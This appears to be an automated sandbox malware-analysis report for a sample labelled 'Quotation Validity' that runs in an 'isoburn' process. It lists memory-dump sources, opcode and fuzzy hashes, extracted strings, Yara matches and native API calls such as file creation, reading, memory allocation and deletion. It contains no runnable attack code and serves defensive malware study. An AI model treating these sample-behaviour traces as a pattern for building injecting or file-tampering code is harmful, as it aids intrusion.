                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                • Instruction ID: 7d4402359ed6c3198fa8570d660a4566d52d6031a5a4f344d9f188cc32cb063f
                                                                                • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                • Instruction Fuzzy Hash: 0EC08CF81456816AEF2B6728C900B283A60BB00A0EF95019CAB40394A2C368DC028218
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: df7e2399e7ed8d145938106efc6c447246f3060cba0f8f0866308d5b49c866e6
                                                                                • Instruction ID: 954edd83d05da3f4e9d15d3b10e969ccc928856465cebadf38d53330e461349d
                                                                                • Opcode Fuzzy Hash: df7e2399e7ed8d145938106efc6c447246f3060cba0f8f0866308d5b49c866e6
                                                                                • Instruction Fuzzy Hash: 6C90022920184442E140725D4804B0F510597E1606F95C05DA4156554CC9168E595721
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7487d5217bb2a2cd8a1370fef0b0a25bfad944358cffd086455b94886d0191ea
                                                                                • Instruction ID: 3832f49808d42b5ba9d6b359111c032699e7b4c455577bcfe8addd7ef4b383a8
                                                                                • Opcode Fuzzy Hash: 7487d5217bb2a2cd8a1370fef0b0a25bfad944358cffd086455b94886d0191ea
                                                                                • Instruction Fuzzy Hash: AF90022924140802E140715D84147071006D7D0A05F55C055A0024554DC6178F6967B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9e48c8d878dcddc8df2a7e2fee7cfa8f934f61a9312fe813f5cf51668f863165
                                                                                • Instruction ID: d5bb9ab70af8c0d8bdadac28823c1c282a71a80f7d5350f521e4061b7456a557
                                                                                • Opcode Fuzzy Hash: 9e48c8d878dcddc8df2a7e2fee7cfa8f934f61a9312fe813f5cf51668f863165
                                                                                • Instruction Fuzzy Hash: AA90023960580012E140715D48845465005A7E0705B55C055E0424554CCA158F5A5361
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4d34ef6aade0ee711f859f8889e7bb964d18cdffae478c45e7e4ea30a3630a99
                                                                                • Instruction ID: 6a21c0ad8c2c910d24fba8bf2362fc1b2c376d96f3ebb58d1cc7e27d46c06d1e
                                                                                • Opcode Fuzzy Hash: 4d34ef6aade0ee711f859f8889e7bb964d18cdffae478c45e7e4ea30a3630a99
                                                                                • Instruction Fuzzy Hash: CE900269601500429140715D48044067005A7E1705395C159A0554560CC6198E599369
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 74c73195a3bdce7eaa8a9644e1ec437f55c51226c19e022bd506ce55a3b65dad
                                                                                • Instruction ID: 21bf87ffe1db5ced185b986b7ccf18e6ba11722f1b63e812e4be3de81d12407e
                                                                                • Opcode Fuzzy Hash: 74c73195a3bdce7eaa8a9644e1ec437f55c51226c19e022bd506ce55a3b65dad
                                                                                • Instruction Fuzzy Hash: D190022924545102E150715D44046165005B7E0605F55C065A0814594DC5568E596321
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 303be217fb79c1bc944a7658b8afaf5d8b2d810de6a0ed8eac94b0e998b63a61
                                                                                • Instruction ID: f1d55a026e9957386f0ae46103782db4235225bf9d830715b97c1e91e356f704
                                                                                • Opcode Fuzzy Hash: 303be217fb79c1bc944a7658b8afaf5d8b2d810de6a0ed8eac94b0e998b63a61
                                                                                • Instruction Fuzzy Hash: A090023960540802E150715D4414746100597D0705F55C055A0024654DC7568F5977A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0806d807a84f830f3858091c1f77d8461ac39386e53fe636a39c7925403df9b5
                                                                                • Instruction ID: e8c6604a02ddf9db4d8e8a05a78966fdd23b8a413f8c7129ce87818f23fc4d41
                                                                                • Opcode Fuzzy Hash: 0806d807a84f830f3858091c1f77d8461ac39386e53fe636a39c7925403df9b5
                                                                                • Instruction Fuzzy Hash: 3490023920140802E104715D4804686100597D0705F55C055A6024655ED6668E957331
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e772bfb8c266d7ddbff125728f7d8c3ea8883c863932aa7a06176eb8189aafd4
                                                                                • Instruction ID: 80e8360e16b2a9973efe9e30d7960204bd8beaa3e9092a5cd59e733941d0164b
                                                                                • Opcode Fuzzy Hash: e772bfb8c266d7ddbff125728f7d8c3ea8883c863932aa7a06176eb8189aafd4
                                                                                • Instruction Fuzzy Hash: 1D90023920140802E180715D440464A100597D1705F95C059A0025654DCA168F5D77A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3159e849cc4e23d9b1206027822242f60778f6dc94d934982f8dfb36a1a8e3a9
                                                                                • Instruction ID: 79af69b8790c9391c09bdf7bd20601f1107bcbcb7e0dd24fd78ecdf48711f9b0
                                                                                • Opcode Fuzzy Hash: 3159e849cc4e23d9b1206027822242f60778f6dc94d934982f8dfb36a1a8e3a9
                                                                                • Instruction Fuzzy Hash: 7990023920544842E140715D4404A46101597D0709F55C055A0064694DD6268F59B761
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 637b616af96016efaf52f8b5f20b6fe3271bf911194f0c7afa491c8483614474
                                                                                • Instruction ID: b711ae4c6562547365f733b75891a1f28a164d237286c5b07f870a33344cfee2
                                                                                • Opcode Fuzzy Hash: 637b616af96016efaf52f8b5f20b6fe3271bf911194f0c7afa491c8483614474
                                                                                • Instruction Fuzzy Hash: 059002A9201540929500B25D8404B0A550597E0605B55C05AE1054560CC5268E559335
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1accde5bab95ecff5bf1be74015624335f9af78796338c9d34f92d7b7d3d971c
                                                                                • Instruction ID: 96fc9f75cb972bf04095749bd121fe78a137de699fecb95afb47355b8213b997
                                                                                • Opcode Fuzzy Hash: 1accde5bab95ecff5bf1be74015624335f9af78796338c9d34f92d7b7d3d971c
                                                                                • Instruction Fuzzy Hash: 5C90022D221400025145B55D060450B1445A7D6755395C059F1416590CC6228E695321
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 396ea557ee9bc2a3ca2b0500e5bf4ef56fef7c165dab82281263325e03b50c89
                                                                                • Instruction ID: 4f6a50e211163c247993835575bbcc966945dc7467917f75ce8be496d6e15d0a
                                                                                • Opcode Fuzzy Hash: 396ea557ee9bc2a3ca2b0500e5bf4ef56fef7c165dab82281263325e03b50c89
                                                                                • Instruction Fuzzy Hash: 4C90043D311400035105F55D07045071047D7D5755355C075F1015550CD733CF755331
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f7f0ecc5a7043a08803376658485c8cd9e5d7fa6f0a082319f373d1636aab5b6
                                                                                • Instruction ID: 79f594117672e83180d94aa87903634531ff7537f832ae998acfa312d11dc572
                                                                                • Opcode Fuzzy Hash: f7f0ecc5a7043a08803376658485c8cd9e5d7fa6f0a082319f373d1636aab5b6
                                                                                • Instruction Fuzzy Hash: 8690022930140003E140715D54186065005E7E1705F55D055E0414554CD9168E5A5322
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6732de026f4743cf19e3e486a176fdbd7959f0fdbbdaa13bc401e8640c89fd28
                                                                                • Instruction ID: 14b22ee7576b1269c88df90b93dc7489f528bf8becd05529236116feffd3922a
                                                                                • Opcode Fuzzy Hash: 6732de026f4743cf19e3e486a176fdbd7959f0fdbbdaa13bc401e8640c89fd28
                                                                                • Instruction Fuzzy Hash: 4190022D21340002E180715D540860A100597D1606F95D459A0015558CC9168E6D5321
                                                                                Memory Dump Source
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: 4e35387fa978fd96ca4166a3c78cd4c19d84acd3dabbaf85bf1e283b9ad30827
                                                                                • Instruction ID: ef8234b562f9e76432e4097d15945faa92636b6e122c0a4df3f0652571616745
                                                                                • Opcode Fuzzy Hash: 4e35387fa978fd96ca4166a3c78cd4c19d84acd3dabbaf85bf1e283b9ad30827
                                                                                • Instruction Fuzzy Hash: C251EEB5A00156BFCB11DB9C88D45BFFBF8BB482487148229F5A9D7A41E334EE5087D0
                                                                                Strings
                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 013E4742
                                                                                • ExecuteOptions, xrefs: 013E46A0
                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 013E4655
                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 013E4725
                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013E46FC
                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 013E4787
                                                                                • Execute=1, xrefs: 013E4713
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                • API String ID: 0-484625025
                                                                                • Opcode ID: 5d1f78a4a52a6c5c12f9615e79cd43d5b50be087330b47cf597c95107c68e556
                                                                                • Instruction ID: aec7f000751effca7ba252c01e50a0d3fdeff0ab355a04d1e41e9b211366625e
                                                                                • Opcode Fuzzy Hash: 5d1f78a4a52a6c5c12f9615e79cd43d5b50be087330b47cf597c95107c68e556
                                                                                • Instruction Fuzzy Hash: 3351FB356002197AEF21EBA8DCC9FF977BCEF1871CF440099D605A72A1E7729A458F50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-$0$0
                                                                                • API String ID: 1302938615-699404926
                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction ID: c591cae41ccde1842495be059f2e40a8500ca12c715a50f0d1eced1382f7a2a4
                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction Fuzzy Hash: 4181C270E052499EEF258E6CC8D17FEFFA1AF45328F18411ADA51A7A99EF348840C751
                                                                                Strings
                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 013E7B7F
                                                                                • RTL: Re-Waiting, xrefs: 013E7BAC
                                                                                • RTL: Resource at %p, xrefs: 013E7B8E
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 0-871070163
                                                                                • Opcode ID: 61aa097eb985094c7237c2bec197c94a1fd9068fcf45ea0350f82bd7984adb24
                                                                                • Instruction ID: 241d7e67fe723fd8b823cb1358c142d9e610328b0e20783126ea29897db01fea
                                                                                • Opcode Fuzzy Hash: 61aa097eb985094c7237c2bec197c94a1fd9068fcf45ea0350f82bd7984adb24
                                                                                • Instruction Fuzzy Hash: 6D41E3353007079FDB20CE29C840B6AB7E9EF98718F540A1DFA5A9B780DB71E8058B91
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013E728C
                                                                                Strings
                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 013E7294
                                                                                • RTL: Re-Waiting, xrefs: 013E72C1
                                                                                • RTL: Resource at %p, xrefs: 013E72A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-605551621
                                                                                • Opcode ID: a72e9239139807eee8ebfe36ffed788fa10b5a1e22f2568de09d544f1512c1bf
                                                                                • Instruction ID: c5aa28d3ef3b7aad9310203840ee0a26994764182245db86eef1cac32deca366
                                                                                • Opcode Fuzzy Hash: a72e9239139807eee8ebfe36ffed788fa10b5a1e22f2568de09d544f1512c1bf
                                                                                • Instruction Fuzzy Hash: 7541D035600316ABD721DE29CC41F6ABBE9FB54718F100619FD55AB680DB31F84287D1
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-
                                                                                • API String ID: 1302938615-2137968064
                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction ID: 2461ee7ba620245fc28a03fed517be43a3545d39dd303473da4b97cb4b7ec675
                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction Fuzzy Hash: 0891A071E0020A9AEB24DF6DC8C16FEBBA5EFC4768F14451AEB55E7AC0F73089418B15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $$@
                                                                                • API String ID: 0-1194432280
                                                                                • Opcode ID: 323d8e71374cd41207d4e35646051e76ad9fc1bf983438de5528194d63f833fb
                                                                                • Instruction ID: 412de7f0294dbb6c6e4383f241da05351b8d4444495c828b8b409ee6c83b61f2
                                                                                • Opcode Fuzzy Hash: 323d8e71374cd41207d4e35646051e76ad9fc1bf983438de5528194d63f833fb
                                                                                • Instruction Fuzzy Hash: 5F811C72D00269DBDB35DB58DC44BEAB7B8AB48718F0041DAEA19B7250D7745E84CFA0
                                                                                APIs
                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 013FCFBD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CallFilterFunc@8
                                                                                • String ID: @$@4rw@4rw
                                                                                • API String ID: 4062629308-2979693914
                                                                                • Opcode ID: 623de3daedcee71667d7b695da2816aca4a394f61df7541b6dafa1a8f9cd5935
                                                                                • Instruction ID: e93290bbede28e7e5155051afa567cbbcf2a29147f3bf3022a0e6a6d6cdb5fb7
                                                                                • Opcode Fuzzy Hash: 623de3daedcee71667d7b695da2816aca4a394f61df7541b6dafa1a8f9cd5935
                                                                                • Instruction Fuzzy Hash: 8941A0B190035ADFDB219FA9C840AAEFBB8FF54B18F10402EEA05DB264D734D905CB61

                                                                                Execution Graph

                                                                                Execution Coverage:2.9%
                                                                                Dynamic/Decrypted Code Coverage:4.3%
                                                                                Signature Coverage:1.6%
                                                                                Total number of Nodes:437
                                                                                Total number of Limit Nodes:71

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ")$#$#$$u$'$-$-~$.$@k$H$O($T$Z/$[5$]5$f?$pa$r$vj$}$K
                                                                                • API String ID: 0-3922967351
                                                                                • Opcode ID: eb47411d3c166f798a7f1cddeacca136febb36540cb6d39fee69cf2c41bbb43b
                                                                                • Instruction ID: 4d58c21e99c7b5abf234e015722dc75c5e5030720d6b09e163a0b0a7897eacc5
                                                                                • Opcode Fuzzy Hash: eb47411d3c166f798a7f1cddeacca136febb36540cb6d39fee69cf2c41bbb43b
                                                                                • Instruction Fuzzy Hash: E122B2B0D45229CBEB24CF45CDA4BDDBBB2BB84308F1081D9C50D6B291DBB59A88CF55
                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A5C5C4
                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02A5C5FF
                                                                                • FindClose.KERNELBASE(?), ref: 02A5C60A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstNext
                                                                                • String ID:
                                                                                • API String ID: 3541575487-0
                                                                                • Opcode ID: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                                                • Instruction ID: 48a1d102d071f0a0fcf9806ceaa299cae799b46288c04aa8ec5b2f2d345d4e48
                                                                                • Opcode Fuzzy Hash: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                                                • Instruction Fuzzy Hash: E93192B5940318BBDB20DBA4CC85FFB77BD9B44758F144599B909A6180EF70AA848BA0
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?,?,?), ref: 02A691A1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                                                • Instruction ID: e923ed198427793dd7110eb8530f65784f7658a886c1358f9db9d7b745925bd4
                                                                                • Opcode Fuzzy Hash: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                                                • Instruction Fuzzy Hash: BF31D5B5A01608ABDB54DF98D980EEEB7F9AF88310F104619F919A7341DB30A941CFA4
                                                                                APIs
                                                                                • NtReadFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?), ref: 02A692F6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                                                • Instruction ID: 05b61776cdce35da727ae83952020e2f7bb249d297ffee47a452bdb62625edef
                                                                                • Opcode Fuzzy Hash: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                                                • Instruction Fuzzy Hash: B531F8B5A00208AFDB14DF98D940EEFB7F9AF88704F108219F918A7341DB70A951CFA4
                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(02A51CAE,9ACB2CF8,02A67EAF,00000000,00000004,00003000,?,?,?,?,?,02A67EAF,02A51CAE), ref: 02A695DB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                                                • Instruction ID: 65bcedd73e3e9124c4204709e9da3b233ad1d27056de6ff1ba6309e19bc5cfa2
                                                                                • Opcode Fuzzy Hash: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                                                • Instruction Fuzzy Hash: 082137B5A00209AFDB10DF98DD40FEFB7B9EF88700F104619F918A7241DB74A911CBA5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                • Opcode ID: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                                                • Instruction ID: b7672e45bdf444c08d606815b1299ce361db4662f7181e48c8d21e053469f14c
                                                                                • Opcode Fuzzy Hash: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                                                • Instruction Fuzzy Hash: 3611CE75641604AEE620EB64DD01FFBB3ACEF85704F10461DF918A7281EF75B9028BA5
                                                                                APIs
                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02A693D4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                • Instruction ID: 9f5ab3c02d3c5d43ab8a1b5d6bb6e6d2e1cce6258dd7300bb513ed4c8f3713b7
                                                                                • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                • Instruction Fuzzy Hash: DBE04636240204BBE220AA69DD45FEB77ADDBC5710F014119FA0CA7242DA71BA118BB0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
